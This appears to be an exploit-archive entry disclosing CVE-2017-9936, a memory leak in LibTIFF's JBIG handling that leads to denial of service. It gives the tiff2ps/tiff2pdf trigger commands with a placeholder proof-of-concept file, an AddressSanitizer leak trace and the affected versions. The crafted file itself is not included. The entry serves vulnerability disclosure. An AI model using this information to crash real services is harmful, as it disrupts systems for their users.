id: 28087
date: 07/06/2017
title: LibTIFF - tif_jbig.c Denial of Service Exploit
author: OWL337
cves: CVE-2017-9936

Source: http://bugzilla.maptools.org/show_bug.cgi?id=2706
 
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
 
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
 
The asan debug information is below:
 
$./tiff2ps $POC  
 
 
=================================================================
==26627==ERROR: LeakSanitizer: detected memory leaks
 
Direct leak of 1792 byte(s) in 7 object(s) allocated from:
    #0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
    #1 0x7f7c4dca72fd  (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
    #2 0x3ea  (<unknown module>)
 
Indirect leak of 170491316224 byte(s) in 223 object(s) allocated from:
    #0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
    #1 0x7f7c4dca72fd  (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
    #2 0x3ea  (<unknown module>)
 
SUMMARY: AddressSanitizer: 170491318016 byte(s) leaked in 230 allocation(s).
 
 
Affected version:
<=the Latest version (4.0.8)

#  0day.today [2023-03-26]  #